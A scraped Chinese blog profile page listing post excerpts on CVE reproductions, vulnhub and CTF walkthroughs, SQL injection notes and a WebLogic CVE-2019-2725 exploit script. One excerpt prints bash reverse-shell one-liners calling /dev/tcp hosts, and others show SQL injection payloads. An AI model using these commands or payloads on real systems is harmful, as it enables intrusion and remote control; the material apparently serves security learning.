自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(78)
  • 收藏
  • 关注

原创 centos linux7忘记root密码,进行密码重置

小编今天就忘记Linux root 用户的口令,下面就由小编来教教大家如果忘记root口令怎么办第1步:开机后在内核上按“e”。第二步:按e以后会进入内核启动页面,在linux16这行的后面输入“rd.break console=tty0”然后按“ctrl+x“如下图第3步:按完ctry+x 后进入到了系统的紧急求援模式,并依次输入下述指令修改密码:mount –o remount,rw /sysrootchroot /sysrootpasswd ...

2020-07-06 21:44:49 947

原创 Docker镜像服务器内编辑文件报错 bash: vim: command not found

小编今天在自己搭建的docker镜像服务器内,本来想修改一下服务器里面的某个配置文件的,但是,在编辑文件的过程中显示报错,具体显示如下:root@haha:/# nanobash: nano: command not foundroot@haha:/# picobash: pico: command not foundroot@haha:/# vibash: vi: command not foundroot@haha:/# vimbash: vim: command no

2020-07-01 23:31:40 731 1

原创 CVE-2019-11043远程代码执行漏洞复现

CVE-2019-11043远程代码执行漏洞复现漏洞名称:php fastcgi 远程命令执行漏洞漏洞类型:远程代码执行漏洞漏洞危害:高危漏洞来源:https://www.nginx.com/blog/php-fpm-cve-2019-11043-vulnerability-nginx/公布时间:2019-10-28涉及应用版本:<7.1.33的PHP版本7.1.x...

2019-11-02 09:35:00 6331

原创 AI:WEB:02靶场题解

AI:WEB:02靶场题解前期准备镜像下载https://www.vulnhub.com/entry/ai-web-2,357/环境配置:在VM以net连接打开虚拟机使用的机器:攻击机:kali linux靶机:ip随配(192.168.203.136)渗透开始1.nmap发现主机,并扫描其ip信息,nmap --script=vuln 192.168.203.136发现路...

2019-09-19 18:08:33 1124 4

原创 DC靶场1-6

靶机下载:https://download.vulnhub.com/dc/环境配置:在VM以net连接打开虚拟机使用的机器:攻击机:kali linux 靶机:DC1,2,4,5,6(IP随配)DC11.nmap扫描端口nmap -sS -A 192.168.119.1352. 访问页面,收集信息http://192.168.119.135:80 ...

2019-09-16 10:38:19 2794

原创 AI:Web-1靶场题解

AI:Web-1靶场题解前期准备镜像下载https://www.vulnhub.com/entry/ai-web-1,353/环境配置:在VM以net连接打开虚拟机使用的机器:攻击机:kali linux靶机:ip随配(192.168.119.139)渗透开始1.nmap发现主机,扫描路径nmap -A 192.168.119.139nikto -h http://19...

2019-09-16 10:36:14 717

原创 kali安装教程及踩的坑

对于小编来说,这两天真真是非常难受的。一直以来,小编得kali都是很友爱的童鞋帮小编安装的,但是天道好轮回,终究还是轮到小编我了。且说,这两天小编都没怎么听课,每节课都带着笔记本,在老师的课堂上努力的安装着kali。最终,小编自觉能力有限,还是去找了非常友爱的童鞋,完成了此次2019年的kali安装。。。虽说,kali是童鞋安装的,但是踩坑的,小编我还是遇到不少。。。先来一波,正常的安装教...

2019-09-13 17:05:59 2014

原创 Digitalworld.local: JOY Vulnhub靶场题解

前期准备镜像下载https://www.vulnhub.com/entry/digitalworldlocal-joy,298/环境配置:在VM以net连接打开虚拟机使用的机器:攻击机:kali linux,ubuntu靶机:ip随配(192.168.119.137)渗透开始1.nmap发现主机,并扫描其ip信息nmap -A 192.168.119.1372.发现ftp相...

2019-08-16 16:53:30 846

原创 Postgres漏洞复现

Postgres漏洞汇现CVE-2018-1058漏洞名称:远程代码执行漏洞漏洞类型:远程代码执行公布时间:2018-3-1涉及应用版本:PostgreSQLhttps://www.securityfocus.com/bid/103221针对操作系统:windows/linux/mac漏洞简介:拥有普通权限的psql用户可以创建恶意函数。在管理员使用某些工具的时候,就会...

2019-07-21 17:33:40 883

原创 SQL注入知识汇总

SQL注入基础篇原理:SQL注入,意思就是指 输入一条SQL语句,插入到代码中,修改后台SQL语句,使程序执行,进而达到进行攻击的目的常用的SQL语句:选择(select)语句 select * from table_name更新(update)语句 update table_name set dump_name=vaule删除(delete)语句 delete from tabl...

2019-07-19 11:06:47 847

原创 fastjson复现

fastjson2017-0315远程代码执行漏洞复现漏洞名称:fastjson远程命令执行漏洞漏洞类型:远程代码执行漏洞漏洞危害:高危漏洞来源:https://github.com/alibaba/fastjson/wiki/security_update_20170315公布时间:2017-03-15涉及应用版本:fastjson小于1.2.24的所有版本poc适用于...

2019-07-13 21:54:44 1850 1

原创 weblogic CVE-2019-2725 pocsuite3的 poc

import refrom collections import OrderedDictfrom urllib.parse import urljoinfrom pocsuite3.api import Output,POCBase,register_poc,requests,logger,POC_CATEGORY,OptDictfrom pocsuite3.api import ge...

2019-07-03 21:32:05 1926

原创 weblogic CVE-2019-2725 的一键脚本

# -*- coding: utf-8 -*-import requestsimport argparseclass Exploit: def __init__(self, rhost, lport, lhost): self.url=rhost self.lhost=lhost self.lport=lport def run(self): headers={ ...

2019-07-03 21:30:29 2299 3

原创 常用的反弹shell的语句

shell编码:http://www.jackson-t.ca/runtime-exec-payloads.htmlbash命令:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i >& /dev/tcp/65.49.135.12/8888 0>&1 &perl版本:...

2019-07-03 21:28:26 703

原创 python多线程爬虫爬取喜马拉雅网页所有带id的音频

本学期python课程设计:设计流程图:代码实现:#-*-coding:utf-8-*-import requestsimport reimport osimport multiprocessingimport timefrom bs4 import BeautifulSoupdef save_path(): if os.path.exist...

2019-07-03 21:25:21 1419

原创 pickachu漏洞学习---------sql注入篇

1.数字型注入(POST):源码:payload: -1' union select 1,2 #2.字符型注入(GET):源码:payload: 0'union select 1,database() #3.搜索型注入源码:payload: 0' union select 1,2,database() #...

2019-06-23 09:50:09 1093 1

原创 靶机渗透学习----Billu_b0x

靶机下载地址及安装环境靶机下载地址:https://download.vulnhub.com/billu/靶机环境:处于net网络下的VM虚拟机渗透实战攻击机:192.168.146.131靶 机:192.168.146.133(扫描后得到的)1.安装完后,由于不知道node靶机的地址,所以渗透第一步就是发现主机:1)使用nmap快速扫描,发现存活主机:nma...

2019-06-07 16:14:02 2873

原创 靶机渗透学习----node1

靶机下载地址及安装环境靶机下载地址:https://www.vulnhub.com/entry/node-1,252/靶机环境:处于net网络下的VM虚拟机渗透实战攻击机:192.168.146.131靶 机:192.168.146.132(扫描后得到的)1.安装完后,由于不知道node靶机的地址,所以渗透第一步就是发现主机:1)使用nmap快速扫描,发现存活主机:...

2019-06-06 20:05:21 1129 1

原创 bugku-----MISC----猫片(恒安)

1.题目,hint:LSB,BGR,NTFS2.解压后得:3.由提示得:LSB,BGR (使用工具stegSolve),保存为.png4.查看文件(Winhex)5.format提取6.winhex修改图片高度7.扫描,StegSolve反转一下颜色8.网页扫描(https://www.bejson.com/convert/qrcode/)...

2019-05-10 17:19:25 519

原创 MOCTF ---- MISC -----WriteUp

1.我可是黑客打开题目是一张图片,将他保存到本地,即:一般第一题都是是道签到题,所以使用文档打开这张图片,小编用的是nodepad++,在文档的最后面,即:2.假装安全同上题,先将图片保存到本地,再用nodepad++打开,即:可以看到,在文档的最后面有flag.txt,这说明,这个图片不是一张简单的图片,他里面包含了文件,需要分离出来。这里我使用的是...

2019-04-26 19:39:03 465 3

原创 BugkuCTF----MISC---乌云邀请码

打开题目,下载的是一张图片:一看到这张图片,小编都会忍不住的去访问他给出的链接。但是,很遗憾的是访问完后并没有什么用。这时候,小编又想把图片发送到图片解析器(StegSolve)里解析。就在把所有的图片过一遍后,发现并没有任何线索,本来打算放弃的时候,又想到这工具还有其他的解析图片的方法:做完后,小编我到现在还是处于懵逼状态。。。。。。...

2019-04-21 14:40:42 437

原创 虚拟机可以ping主机,主机Ping不通虚拟机,主机适配器中没有VMware虚拟机网络的适配器

首先以管理员的身份运行VM,再打开 编辑---》虚拟网络编辑器 --》点击VMnet8将红线所示的选项框勾选,点击确定。完成后,打开 “网络和Internet”设置 ==》 点击更改适配器选项,查看是否有VM的适配器,若是未成功,则说明在主机中VM的注册表有问题,则下载CCleaner这个软件修复注册表的内容:CCleaner下载:1.若是有软件管家则可以直接在里面搜索并...

2019-04-12 15:15:03 1951 7

原创 Kali linux 如何配置Web站点

写这篇博客,也是为了纪念一下早上消耗的光阴。。。1.在kali里安装apache2的服务apt-get install apache2安装好的apache2文件是放在kali的计算机/etc/apache2运行的文件是在计算机/etc/init.d/apache22.搭建web站点kali 默认的web站点在/计算机/var/www/html使...

2019-04-01 11:26:54 9537 2

原创 几种SQL注入(insert,update,delete,`, \ 等。。。)

insert注入:$sql = "insert into user(username,password) values('$username','$password',)";payload: 适用于字符型: ' or updatexml(1,concat(0x7e,(database())),0) or ' 适用于数字型: ' or extractva...

2019-03-23 18:32:49 7870

转载 Ubuntu16.04 登陆完后出现蓝屏

解决方法:问题分析启动 Ubuntu 可以进入登录界面,说明系统是可以运行起来的。没有发生大块的核心数据损坏,linux 系统一般都可以修复,一定要淡定。于是开始放狗(google)搜索。“VMware Ubuntu 蓝屏”“VMware Ubuntu 开机蓝屏”“VMware Ubuntu 登录蓝屏”依次搜索查看,找到的相关内容寥寥无几。多数是 Windows 蓝屏问题。后来看到一篇是讲...

2019-03-23 17:21:34 484 2

原创 BugKuCTF------代码审计模块

1.extract变量覆盖<?php$flag='xxx';extract($_GET);if(isset($shiyan)){$content=trim(file_get_contents($flag));if($shiyan==$content){echo'flag{xxx}';}else{echo'Oh.no';}}?>分析代码可得知,ex...

2019-03-20 19:09:46 1238 5

原创 BugkuCTF中套路满满的题--------never give up

这道题目,当我做出来的时候,我此刻的内心是很复杂的。。。。进去,页面内容是 never never never give up !!!看到这里,感觉又要查看一大波信息。。。。刚开始,还是先查看源码,发现有一个提示:看到有一个提示,立马访问,你会看到进入到了一个CTF论坛,起初,小编以为flag回藏在论坛里,所以开始浏览论坛之旅。浏览下来,发现这论坛和平时见到的论坛没啥区...

2019-02-28 14:14:55 1584

原创 BugkuCTF中套路满满的题-----------Trim的日记本

这道题目,说起来小编看到题目内容的时候,以为是一道sql注入

2019-02-28 13:41:18 2323 1

原创 BugkuCtf中套路满满的题----------文件上传2(湖湘杯)

这道题目说是文件上传,但经过小编实践证明,其实与文件上传是一点关系都没有的首先,进入的界面这样子的:仔细查看,有一段话是这样子的:2017 © All rights reserved. 听说可以用菜刀!!! 为什么不试试dama.php dama或者b374k.php 听说蛮有用的。看到这句话,是不是觉得上传的文件名称是dama.php或是b374k.php,但其实是白盒过滤了...

2019-02-28 10:07:17 1116 2

原创 window server 2003 web网站搭建

1.配置IIs6和新建web站点https://blog.csdn.net/u011781521/article/details/539143352.Win2003下IIS以FastCGI模式运行PHPhttps://www.jb51.net/article/57916.htm3.重启IIS服务的几种方法小结https://www.jb51.net/article/57915....

2019-02-16 11:41:26 1046

原创 BugKuCTF中套路满满的题----------啊哒

首先,下载的是一张图片,按照我以往的做题经验,先对图片的属性信息分析一波,即可得到一串字符串经由十六进制转换为字符串,解密可得发现得到的key好像没有任何作用,既然有key的话,那么可能在这个图片里,还有隐藏的文件需要使用key才能打开。此时,应该对图片进一步的解析,用nodepad++打开,查找一下是否有关flag的信息:很明显,有flag.txt这个文件,那么之前得到的...

2019-02-13 20:29:48 1803

原创 python爬虫一些好的视频讲解

小编也是正在学习python爬虫,所以将小编我所看到的不错的视频想分享给各位小哥哥周莫烦的视屏讲的内容挺完整的,思路讲的也清晰,听他讲课非常幽默周莫烦的正则表达式:https://www.youtube.com/watch?v=l1MAW1z641E这是周莫烦又一个系列的,主讲python3的爬虫基础,对于爬虫什么基础都没有的人来说,这可以算说是一个很不错的启蒙视屏教程https:...

2019-02-09 19:08:15 646 2

原创 BugKuCTF中套路满满的题-------login3(SKCTF)

根据题目给的提示,无疑是基于bool的盲注,而关于盲注的一般都与脚本有关,毕竟很少人会去一个一个猜然而,再用脚本解决这个问题时,也需要找到准确的注入语句,否则,白费。。。首先进入页面一试用户名为admin,发现密码报错(说明此用户存在,那么关键的问题就是密码了。。):再构造语句,进行几次的基于bool盲注的注入,查看一下有没有绕过一些特殊的语句username='^(1)^1...

2019-02-09 15:50:35 2992 2

原创 python中报错requests.exceptions.InvalidHeader: Invalid return character or leading space in header: Acc

这是因为你在写头部的时候加入了空格,例:headers={ 'Host' : ' 123.206.31.85:49167', 'User-Agent' : ' Mozilla/5.0 (Windows NT 10.0; WOW64; rv:65.0) Gecko/20100101 Firefox/65.0', 'Accept' : ' text/html,applic...

2019-02-09 15:26:38 16306 6

原创 PHP中base64的加解密函数应用

base64_encode是加密,base64_decode是解密1.base64_encode语法:string base64_decode(string data);$data = "d3d3LmpiNTEubmV0IOiEmuacrOS5i+Wutg==";echo base64_decode($data); 将$data的值进行解密2.base64_decode语法:s...

2019-02-09 10:26:44 450

原创 BugKuCtf中套路满满的题-------字符?正则

这道题说实话,我是不会的,,,,因为我对php函数中的正则函数preg_match()不太熟,但俗话说:哪里不会点哪里---所以,在我搜索其他博客后,也算是弄懂了preg_match函数内匹配的东西了:&lt;?php highlight_file('2.php');$key='KEY{********************************}';$IM= preg_mat...

2019-01-27 21:56:02 746 2

原创 Bugkuctf套路满满的题--------细心

这道题目,说白了,也就是使用一下工具。。。讲一下大概思路:先查看源码无果  ---&gt; 御剑扫描后台一波 ---&gt; robots.txt ---&gt; 有/resusl.php文件 ---&gt; 访问/resusl.php ---&gt; 传参x=admin ---&gt; flag!!好了,思路很清楚了,那就不截图了。。。 ...

2019-01-25 11:44:01 803

原创 BugkuCTF中套路满满的题-------Welcome to the bugku

这套题目主要涉及到的知识是php伪协议,若是不了解这个的话,这道题目基本就out了。。。当然,不了解的小伙伴,可以到这位大佬的博客去瞅瞅https://www.freebuf.com/column/148886.html其实总结之后,最常所用到的不过是php://input(将文件的内容读出)以及php://filter/read=convert.base64-encode/resourc...

2019-01-24 12:02:40 1765

原创 win2003中IE浏览器中出现强制的安全配置

解决:开始 - -》控制面板 - -》添加或删除程序 - -》添加/删除windows组件 - -》将对话框中去掉“Internet Explorer增强的安全配置”选项前的勾选,单击“下一步(N)&gt; - -》大功告成...

2019-01-22 10:31:57 362

原创 win2003server中出现 “无法加载安装程序库wbemupgd.dll,或是找不到函数OcEntry.请与您的系统管理员联系。特定错误码是 0x7e;"

出现这个问题的一般有两种情况:1,是在环境变量的path里少了路径,解决方法:WINDOWS2003系统添加删除windows组件坏了 我的电脑--属性--高级--环境变量--path里面编辑在变量值后面加上 ;SystemRoot%system32;%SystemRoot%;%SystemRoot%System32Wbem 保存后就可以恢复了2.是在环境变量里面写入的路径有问题,解决...

2019-01-22 10:26:33 658

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除